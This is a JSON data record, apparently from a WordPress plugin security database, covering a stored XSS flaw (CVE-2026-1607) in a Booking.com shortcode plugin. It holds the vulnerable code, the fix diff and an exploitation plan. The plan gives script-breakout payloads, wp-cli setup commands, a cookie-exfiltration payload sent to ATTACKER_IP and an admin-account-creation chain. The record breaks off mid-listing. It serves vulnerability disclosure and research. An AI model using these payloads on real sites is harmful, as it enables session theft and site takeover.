[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$flVA0kWf1D2Go0ewUGB0JwlRbEHQTc_W_m4U4pTMO1bo":3,"$fqKSGvQ-gxzJHvYVB2ms614qaiNHK8ZEj1Mp_guKSN6M":234},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":21,"download_link":22,"security_score":23,"vuln_count":24,"unpatched_count":13,"last_vuln_date":25,"fetched_at":26,"vulnerabilities":27,"developer":56,"crawl_stats":33,"alternatives":64,"analysis":186,"fingerprints":219},"surbma-bookingcom-shortcode","Surbma | Booking.com Shortcode","2.1.1","Surbma","https:\u002F\u002Fprofiles.wordpress.org\u002Fsurbma\u002F","\u003Cp>A simple shortcode to include Booking.com search box into WordPress. This is a very useful plugin if your users don’t have permission to embed JavaScript in the content.\u003C\u002Fp>\n\u003Cp>The shortcode: \u003Ccode>[surbma-bookingcom param=\"ALL_THE_PARAMETERS\"]\u003C\u002Fcode>\u003C\u002Fp>\n\u003Cp>Where param is the parameter that you can find in the Booking.com embed code. 
You need to find the src field, where you have to copy all the parameters after the \u003Ccode>https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?\u003C\u002Fcode> url.\u003C\u002Fp>\n\u003Cp>You can find the parameters at the end of your Booking.com script’s url:\n    \u003C\u002Fp>\n","A simple shortcode to include Booking.com search box into WordPress.",10,1973,0,"2026-04-12T14:58:00.000Z","7.0","5.1","7.4",[19,20],"booking-com","shortcode","https:\u002F\u002Fsurbma.com\u002Fwordpress-plugins\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.1.1.zip",99,1,"2026-04-13 14:39:51","2026-04-16T10:56:18.058Z",[28],{"id":29,"url_slug":30,"title":31,"description":32,"plugin_slug":4,"theme_slug":33,"affected_versions":34,"patched_in_version":6,"severity":35,"cvss_score":36,"cvss_vector":37,"vuln_type":38,"published_date":25,"updated_date":39,"references":40,"days_to_patch":24,"patch_diff_files":42,"patch_trac_url":33,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":48,"research_summary":49,"research_vulnerable_code":50,"research_fix_diff":51,"research_exploit_outline":52,"research_model_used":53,"research_started_at":54,"research_completed_at":55,"research_error":33,"poc_status":33,"poc_video_id":33,"poc_summary":33,"poc_steps":33,"poc_tested_at":33,"poc_wp_version":33,"poc_php_version":33,"poc_playwright_script":33,"poc_exploit_code":33,"poc_has_trace":46,"poc_model_used":33,"poc_verification_depth":33},"CVE-2026-1607","surbma-bookingcom-authenticated-contributor-stored-cross-site-scripting-via-shortcode","Surbma | Booking.com \u003C= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied 
attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=2.1","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 03:37:32",[41],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F01280afb-4745-4f36-823e-ed794bb3353a?source=api-prod",[43,44],"readme.txt","surbma-bookingcom-shortcode.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-1607\n\n## 1. Vulnerability Summary\nThe **Surbma | Booking.com Shortcode** plugin (versions \u003C= 2.1) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the `surbma_bookingcom_shortcode_shortcode` function, which processes the `[surbma-bookingcom]` shortcode. The plugin accepts a user-defined attribute `param`, which is concatenated directly into a `\u003Cscript>` tag's `src` attribute without any sanitization or escaping (such as `esc_attr` or `esc_url`). This allows an attacker with Contributor-level permissions or higher to inject arbitrary HTML attributes or close the script tag entirely to execute malicious JavaScript.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: WordPress Post\u002FPage Editor (standard Gutenberg or Classic editor).\n- **Shortcode**: `[surbma-bookingcom]`\n- **Vulnerable Parameter**: `param`\n- **Authentication**: Required (Contributor role or higher). Contributor is the minimum role that can typically create posts and use shortcodes.\n- **Preconditions**: The plugin must be active. A user with the Contributor role must be able to save a post (even as a draft) and preview it, or an Administrator must view the published post.\n\n## 3. Code Flow\n1.  
**Entry Point**: The shortcode is registered in `surbma-bookingcom-shortcode.php`:\n    ```php\n    add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n    ```\n2.  **Processing**: When a page containing the shortcode is rendered, WordPress calls `surbma_bookingcom_shortcode_shortcode($atts)`:\n    ```php\n    function surbma_bookingcom_shortcode_shortcode( $atts ) {\n        extract( shortcode_atts( array(\n            \"param\" => ''\n        ), $atts ) ); \u002F\u002F $param is extracted from $atts['param']\n        return '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n    }\n    ```\n3.  **Sink**: The `$param` variable is concatenated directly into the return string. Because it is not passed through `esc_attr()` or `esc_url()`, characters like `\"` and `>` can be used to break out of the HTML attribute and tag context.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited via the standard WordPress post creation\u002Fediting flow. It does **not** involve a custom AJAX or REST API endpoint provided by the plugin.\n- **Nonce Needed**: To create\u002Fsave a post as a Contributor, the standard WordPress `_wpnonce` for post creation is required.\n- **Acquisition**:\n    1.  The automated agent logs in as a Contributor.\n    2.  Navigate to `wp-admin\u002Fpost-new.php`.\n    3.  The `_wpnonce` is present in the page source (usually in the `wp.apiFetch` settings or a hidden input).\n    4.  The agent uses the standard `wp-cli` command `wp post create` to bypass the need for manual nonce handling during the injection phase.\n\n## 5. Exploitation Strategy\nThe goal is to inject a payload that executes when an Administrator views the post.\n\n### Step-by-Step Plan:\n1.  **Inject via Post Creation**: Use `wp-cli` as a Contributor to create a post containing the malicious shortcode.\n2.  
**Payload Selection**:\n    -   **Attribute Breakout**: `param=' \" onload=\"alert(origin)\" '`\n        -   Result: `\u003Cscript ... src=\"...html? \" onload=\"alert(origin)\" \">\u003C\u002Fscript>`\n    -   **Tag Breakout (Cleaner)**: `param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>'`\n        -   Result: `\u003Cscript ... src=\"...html?\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\">\u003C\u002Fscript>`\n3.  **Trigger**: Navigate to the frontend URL of the newly created post while logged in as an Administrator.\n\n### HTTP Request Details (Simulating Preview\u002FSave):\nWhile `wp post create` is simpler, if testing the UI flow:\n- **URL**: `http:\u002F\u002Flocalhost:8888\u002Fwp-admin\u002Fpost.php` (for existing) or `wp-admin\u002Fpost-new.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body Parameters**:\n    - `post_title`: `XSS Test`\n    - `content`: `[surbma-bookingcom param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>']`\n    - `action`: `editpost`\n    - `post_type`: `post`\n    - `_wpnonce`: `[extracted_nonce]`\n\n## 6. Test Data Setup\n1.  **User**: Create a user with the `contributor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Post**: Create the post as the contributor.\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"Booking Search\" --post_content='[surbma-bookingcom param=\"\\\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\"]' --user=attacker\n    ```\n\n## 7. 
Expected Results\n- When the page is rendered, the HTML source should contain:\n  ```html\n  \u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>\">\u003C\u002Fscript>\n  ```\n- The browser should execute the `alert(origin)` call.\n\n## 8. Verification Steps\n1.  **Check Database Content**:\n    ```bash\n    wp post list --post_type=post --field=post_content | grep \"surbma-bookingcom\"\n    ```\n2.  **Verify Frontend Output**:\n    Use `http_request` to fetch the post URL and check for the unescaped script tag:\n    ```bash\n    # Get the URL of the last created post\n    POST_URL=$(wp post list --post_type=post --format=ids | xargs -n 1 wp post get --field=url | head -n 1)\n    # Check if the payload is present in the response\n    # (The agent will use browser_navigate and check for the alert)\n    ```\n\n## 9. Alternative Approaches\nIf `alert()` is blocked or hard to detect:\n- **Cookie Exfiltration**: `param='\">\u003C\u002Fscript>\u003Cscript>fetch(\"http:\u002F\u002FATTACKER_IP\u002F?c=\" + btoa(document.cookie))\u003C\u002Fscript>'`\n- **Admin User Creation**: If the target is an Administrator, inject a script that uses the REST API or `user-new.php` to create a new admin account (standard XSS-to-RCE\u002FAdmin chain).\n- **Attribute Injection**: Some browsers might behave differently with `src` attribute breakout. An alternative is `param=' \" onerror=\"alert(1)\" '` if the `src` URL fails to load, though `onload` is more reliable for `\u003Cscript>` tags if the `src` is valid. However, since we close the tag in the primary strategy, that remains the most robust method.","The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `surbma-bookingcom` shortcode in versions up to 2.1. 
This occurs because the `param` attribute is concatenated directly into a script tag's source URL without sanitization or escaping, allowing authenticated contributors to inject arbitrary JavaScript.","\u002F\u002F surbma-bookingcom-shortcode.php lines 28-33\nfunction surbma_bookingcom_shortcode_shortcode( $atts ) {\n\textract( shortcode_atts( array(\n\t\t\"param\" => ''\n\t), $atts ) );\n\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n}\nadd_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.0\u002Fsurbma-bookingcom-shortcode.php\t2020-02-10 13:24:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsurbma-bookingcom-shortcode\u002F2.1.1\u002Fsurbma-bookingcom-shortcode.php\t2026-04-12 14:58:34.000000000 +0000\n@@ -5,7 +5,7 @@\n Plugin URI: https:\u002F\u002Fsurbma.com\u002Fwordpress-plugins\u002F\n Description: A simple shortcode to include Booking.com search box into WordPress.\n \n-Version: 2.0\n+Version: 2.1.1\n \n Author: Surbma\n Author URI: https:\u002F\u002Fsurbma.com\u002F\n@@ -17,20 +17,29 @@\n *\u002F\n \n \u002F\u002F Prevent direct access to the plugin\n-if ( !defined( 'ABSPATH' ) ) {\n-\tdie( 'Good try! 
:)' );\n-}\n+defined( 'ABSPATH' ) || exit;\n \n \u002F\u002F Localization\n-function surbma_bookingcom_shortcode_init() {\n+add_action( 'init', function() {\n \tload_plugin_textdomain( 'surbma-bookingcom-shortcode', false, dirname( plugin_basename( __FILE__ ) ) . '\u002Flanguages\u002F' );\n-}\n-add_action( 'plugins_loaded', 'surbma_bookingcom_shortcode_init' );\n+} );\n \n-function surbma_bookingcom_shortcode_shortcode( $atts ) {\n-\textract( shortcode_atts( array(\n-\t\t\"param\" => ''\n-\t), $atts ) );\n-\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html?'.$param.'\">\u003C\u002Fscript>';\n-}\n-add_shortcode( 'surbma-bookingcom', 'surbma_bookingcom_shortcode_shortcode' );\n+add_shortcode( 'surbma-bookingcom', function( $atts ) {\n+\t$atts = shortcode_atts(\n+\t\tarray(\n+\t\t\t'param' => '',\n+\t\t),\n+\t\t$atts,\n+\t\t'surbma-bookingcom'\n+\t);\n+\n+\t$param = isset( $atts['param'] ) ? $atts['param'] : '';\n+\t$param = is_string( $param ) ? wp_strip_all_tags( $param ) : '';\n+\n+\t$url = 'https:\u002F\u002Fwww.booking.com\u002Fgeneral.html';\n+\tif ( '' !== $param ) {\n+\t\t$url .= '?' . rawurlencode( $param );\n+\t}\n+\n+\treturn '\u003Cscript type=\"text\u002Fjavascript\" src=\"' . esc_url( $url, array( 'https' ) ) . '\">\u003C\u002Fscript>';\n+} );","1. Authenticate to the WordPress site as a user with Contributor-level permissions.\n2. Create a new post or page via the WordPress editor.\n3. Insert the `[surbma-bookingcom]` shortcode into the post content, supplying a malicious payload in the `param` attribute. A working payload uses HTML tag breakout: `[surbma-bookingcom param='\">\u003C\u002Fscript>\u003Cscript>alert(origin)\u003C\u002Fscript>']`.\n4. Save the post as a draft or publish it.\n5. 
When an administrator or any other site visitor views the post, the browser will interpret the closing `\">\u003C\u002Fscript>` sequence, terminate the original Booking.com script tag, and execute the subsequent injected `\u003Cscript>` block.","gemini-3-flash-preview","2026-04-16 15:59:00","2026-04-16 15:59:21",{"slug":57,"display_name":7,"profile_url":8,"plugin_count":58,"total_installs":59,"avg_security_score":60,"avg_patch_time_days":61,"trust_score":62,"computed_at":63},"surbma",28,30210,91,95,73,"2026-04-18T19:27:10.466Z",[65,91,117,140,163],{"slug":66,"name":67,"version":68,"author":69,"author_profile":70,"description":71,"short_description":72,"active_installs":73,"downloaded":74,"rating":75,"num_ratings":76,"last_updated":77,"tested_up_to":78,"requires_at_least":79,"requires_php":80,"tags":81,"homepage":86,"download_link":87,"security_score":88,"vuln_count":89,"unpatched_count":13,"last_vuln_date":90,"fetched_at":26},"shortcodes-ultimate","WP Shortcodes Plugin — Shortcodes Ultimate","7.5.0","Vova","https:\u002F\u002Fprofiles.wordpress.org\u002Fgn_themes\u002F","\u003Ch3>SHORTCODES ULIMATE – THE #1 SHORTCODES PLUGIN\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=description\" rel=\"nofollow ugc\">Shortcodes Ultimate\u003C\u002Fa> is a huge collection of useful elements, that you can use in the post editor, text widgets or even in template files.\u003C\u002Fp>\n\u003Cdiv class=\"embed-vimeo\" style=\"text-align: center;\">\u003Ciframe loading=\"lazy\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F507942335\" width=\"750\" height=\"422\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen>\u003C\u002Fiframe>\u003C\u002Fdiv>\n\u003Ch4>Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fdocs-category\u002Fshortcodes\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=features\" rel=\"nofollow 
ugc\">Over 50 gorgeous shortcodes\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Insert shortcodes in 1 click with Live Preview\u003C\u002Fli>\n\u003Cli>Supports the Block Editor\u003C\u002Fli>\n\u003Cli>Seamlessly integrates with your theme\u003C\u002Fli>\n\u003Cli>Looks great on mobile devices\u003C\u002Fli>\n\u003Cli>Custom CSS editor is included\u003C\u002Fli>\n\u003Cli>Developer-friendly with plenty of hooks and extensive documentation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Included shortcodes\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Posts\u003C\u002Fstrong> – allows you to show specific posts anywhere\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Accordion\u003C\u002Fstrong> – simple toggle block to show\u002Fhide your content\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Button\u003C\u002Fstrong> – highly-customizable button with multiple styles\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lightbox\u003C\u002Fstrong> – a lightbox that you can use with virtually any element\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Image Carousel\u003C\u002Fstrong> – beautiful super-customizable image carousel\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Columns\u003C\u002Fstrong> – must-have tool for creating layouts\u003C\u002Fli>\n\u003Cli>And many more…\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Get Help\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fdocs\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=links-docs\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fshortcodes-ultimate\" rel=\"ugc\">Community Support Forum\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fsupport\u002Fopen-support-ticket\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=links-support\" rel=\"nofollow ugc\">The Pro Support\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>TRY THE PRO VERSION FOR 
FREE\u003C\u002Fh3>\n\u003Cp>Try Shortcodes Ultimate Pro risk-free for 30 days. You are fully protected by our no questions asked refund policy!\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgetshortcodes.com\u002Fpricing\u002F?utm_campaign=wporg&utm_medium=readme&utm_source=try-pro\" rel=\"nofollow ugc\">Upgrade to Pro\u003C\u002Fa>\u003C\u002Fp>\n","A comprehensive collection of visual components for your site",400000,24750356,98,5919,"2026-03-23T19:21:00.000Z","6.9.4","5.0","5.4",[82,83,84,20,85],"carousel","columns","posts","toggle","https:\u002F\u002Fgetshortcodes.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcodes-ultimate.7.5.0.zip",88,36,"2026-04-15 14:02:54",{"slug":92,"name":93,"version":94,"author":95,"author_profile":96,"description":97,"short_description":98,"active_installs":99,"downloaded":100,"rating":101,"num_ratings":102,"last_updated":103,"tested_up_to":104,"requires_at_least":105,"requires_php":106,"tags":107,"homepage":112,"download_link":113,"security_score":114,"vuln_count":115,"unpatched_count":13,"last_vuln_date":116,"fetched_at":26},"mw-wp-form","MW WP Form","5.1.2","Webの相談所","https:\u002F\u002Fprofiles.wordpress.org\u002Fwebsoudan\u002F","\u003Cp>\u003Cstrong>This plugin currently has only the minimum required maintenance releases.\u003C\u002Fstrong>\u003Cbr \u002F>\n\u003Cstrong>Main maintainer has been handed over from @inc2734 to @websoudan.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>MW WP Form can create mail form with a confirmation screen using shortcode.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Form created using shortcodes\u003C\u002Fli>\n\u003Cli>Using confirmation page is possible.\u003C\u002Fli>\n\u003Cli>The page changes by the same URL or individual URL are possible.\u003C\u002Fli>\n\u003Cli>Many validation rules\u003C\u002Fli>\n\u003Cli>Saving inquiry data is possible.\u003C\u002Fli>\n\u003Cli>Displaying Chart using saved inquiry data is 
possible.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Official\u003C\u002Fh4>\n\u003Cp>https:\u002F\u002Fmw-wp-form.web-soudan.co.jp\u003C\u002Fp>\n\u003Ch4>GitHub\u003C\u002Fh4>\n\u003Cp>https:\u002F\u002Fgithub.com\u002Fweb-soudan\u002Fmw-wp-form\u003C\u002Fp>\n\u003Ch4>The following third-party resources\u003C\u002Fh4>\n\u003Cp>Google Charts\u003Cbr \u002F>\nSource: https:\u002F\u002Fdevelopers.google.com\u002Fchart\u002F\u003C\u002Fp>\n\u003Ch4>Contributors\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002F2inc.org\" rel=\"nofollow ugc\">Takashi Kitajima\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Finc2734\" rel=\"nofollow ugc\">inc2734\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwebcre-archive.com\" rel=\"nofollow ugc\">Ryujiro Yamamoto\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fryu263\" rel=\"nofollow ugc\">ryu263\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"http:\u002F\u002Fkee-non.com\" rel=\"nofollow ugc\">Tsujimoto Tomoyuki\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Ftomothumb\" rel=\"nofollow ugc\">tomothumb\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>[Naoyuki Ohata] ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fnanniku\" rel=\"nofollow ugc\">nanniku\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fmt8.biz\u002F\" rel=\"nofollow ugc\">Kazuto Takeshita\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmt8biz\u002F\" rel=\"nofollow ugc\">moto hachi\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.next-season.net\u002F\" rel=\"nofollow ugc\">Atsushi Ando\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fnext-season\u002F\" rel=\"nofollow ugc\">NExt-Season\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fvisualive.jp\u002F\" rel=\"nofollow ugc\">Kazuki 
Tomiyasu\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fkuck1u\u002F\" rel=\"nofollow ugc\">KUCKLU\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fmypacecreator.net\u002F\" rel=\"nofollow ugc\">Kei Nomura\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmypacecreator\u002F\" rel=\"nofollow ugc\">mypacecreator\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmh35\" rel=\"nofollow ugc\">mh35\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fnojimage\" rel=\"nofollow ugc\">Takashi Nojima\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fherikutu\" rel=\"nofollow ugc\">herikutu\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ftsucharoku\" rel=\"nofollow ugc\">tsucharoku\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ft-hamano\" rel=\"nofollow ugc\">Tetsuaki Hamano\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fwildworks\u002F\" rel=\"nofollow ugc\">t-hamano\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fmusus\" rel=\"nofollow ugc\">Susumu Seino\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fmusus\u002F\" rel=\"nofollow ugc\">Susumu Seino\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Flikr\" rel=\"nofollow ugc\">Yosuke Onoue\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Flikr\u002F\" rel=\"nofollow ugc\">likr\u003C\u002Fa> )\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fyudai524\" rel=\"nofollow ugc\">Yudai Konishi\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fyudai524\u002F\" rel=\"nofollow ugc\">Yudai Konishi\u003C\u002Fa> 
)\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fnoldorinfo\" rel=\"nofollow ugc\">takekoshi\u003C\u002Fa> ( \u003Ca href=\"https:\u002F\u002Fprofiles.wordpress.org\u002Fnoldorinfo\u002F\" rel=\"nofollow ugc\">takekoshi\u003C\u002Fa> )\u003C\u002Fli>\n\u003C\u002Ful>\n","MW WP Form is a shortcode-based contact form plugin. This plugin has many features. For example, you can use many validation rules, inquiry data saving,  &hellip;",200000,1824930,84,23,"2026-04-08T02:35:00.000Z","6.4.8","6.0","8.0",[108,109,110,111,20],"confirm","form","mail","preview","https:\u002F\u002Fmw-wp-form.web-soudan.co.jp","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmw-wp-form.5.1.2.zip",83,7,"2026-04-08 07:57:15",{"slug":118,"name":119,"version":120,"author":121,"author_profile":122,"description":123,"short_description":124,"active_installs":125,"downloaded":126,"rating":75,"num_ratings":127,"last_updated":128,"tested_up_to":78,"requires_at_least":129,"requires_php":130,"tags":131,"homepage":136,"download_link":137,"security_score":75,"vuln_count":138,"unpatched_count":13,"last_vuln_date":139,"fetched_at":26},"shortcoder","Shortcoder — Create Shortcodes for Anything","6.5.2","vaakash","https:\u002F\u002Fprofiles.wordpress.org\u002Fvaakash\u002F","\u003Cp>The Shortcoder plugin lets you create custom shortcodes for HTML, JavaScript, CSS and other code snippets. 
Now the shortcodes can be used in posts\u002Fpages and the snippet will be replaced in place.\u003C\u002Fp>\n\u003Ch3>✍ Create shortcodes easily\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Give a name for the shortcode\u003C\u002Fli>\n\u003Cli>Paste the HTML\u002FJavaScript\u002FCSS as shortcode content\u003C\u002Fli>\n\u003Cli>Save !\u003C\u002Fli>\n\u003Cli>Now insert the shortcode \u003Ccode>[sc name=\"my_shortcode\"]\u003C\u002Fcode> in your post\u002Fpage.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Voila !\u003C\u002Fstrong> You got the HTML\u002FJavascript\u002FCSS in your post.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>✨ Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Create \u003Cstrong>custom shortcodes\u003C\u002Fstrong> easily and use them in any place where shortcode is supported.\u003C\u002Fli>\n\u003Cli>Have any \u003Cstrong>HTML\u003C\u002Fstrong>, \u003Cstrong>Javascript\u003C\u002Fstrong>, \u003Cstrong>CSS\u003C\u002Fstrong> as Shortcode content.\u003C\u002Fli>\n\u003Cli>Insert: \u003Cstrong>Custom parameters\u003C\u002Fstrong> in shortcode\u003C\u002Fli>\n\u003Cli>Insert: \u003Cstrong>WordPress parameters\u003C\u002Fstrong> in shortcode\u003C\u002Fli>\n\u003Cli>Multiple editors: Code, Visual and text modes.\u003C\u002Fli>\n\u003Cli>Globally disable the shortcode when not needed.\u003C\u002Fli>\n\u003Cli>Disable shortcode on desktop, mobile devices.\u003C\u002Fli>\n\u003Cli>A button in post editor to pick the shortcodes to insert.\u003C\u002Fli>\n\u003Cli>Execute blocks HTML in shortcode content.\u003C\u002Fli>\n\u003Cli>Insert shortcodes in Gutenberg\u002Fblock editor.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🎲 An example usage\u003C\u002Fh3>\n\u003Col>\n\u003Cli>Create a shortcode named “adsenseAd” in the Shortcoder admin page.\u003C\u002Fli>\n\u003Cli>Paste the adsense code in the box given and save it.\u003C\u002Fli>\n\u003Cli>Use \u003Ccode>[sc name=\"adsenseAd\"]\u003C\u002Fcode> in your posts and pages.\u003C\u002Fli>\n\u003Cli>Tada !!! 
the ad code is replaced and it appears in the post.\u003C\u002Fli>\n\u003Cli>Now you can edit the ad code in one place and the code is updated in all the locations where the shortcode is used.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>Similarly, shortcodes can be created for frequently used snippets.\u003C\u002Fp>\n\u003Cp>You can also add \u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fdocs\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">custom parameters\u003C\u002Fa> (like \u003Ccode>%%id%%\u003C\u002Fcode>) inside the snippets, and change its value like \u003Ccode>[sc name=\"youtube\" id=\"GrlRADfvjII\"]\u003C\u002Fcode> when using them.\u003C\u002Fp>\n\u003Ch3>🧱 Using in block editor\u003C\u002Fh3>\n\u003Cp>Though shortcodes can be used in \u003Cstrong>any\u003C\u002Fstrong> place manually, Shortcoder provides the options below to easily select and insert the shortcodes you have created when working with the block editor.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Shortcoder block\u003C\u002Fli>\n\u003Cli>Toolbar button to select and insert shortcodes inline (under “more”)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>💎 Upgrade to 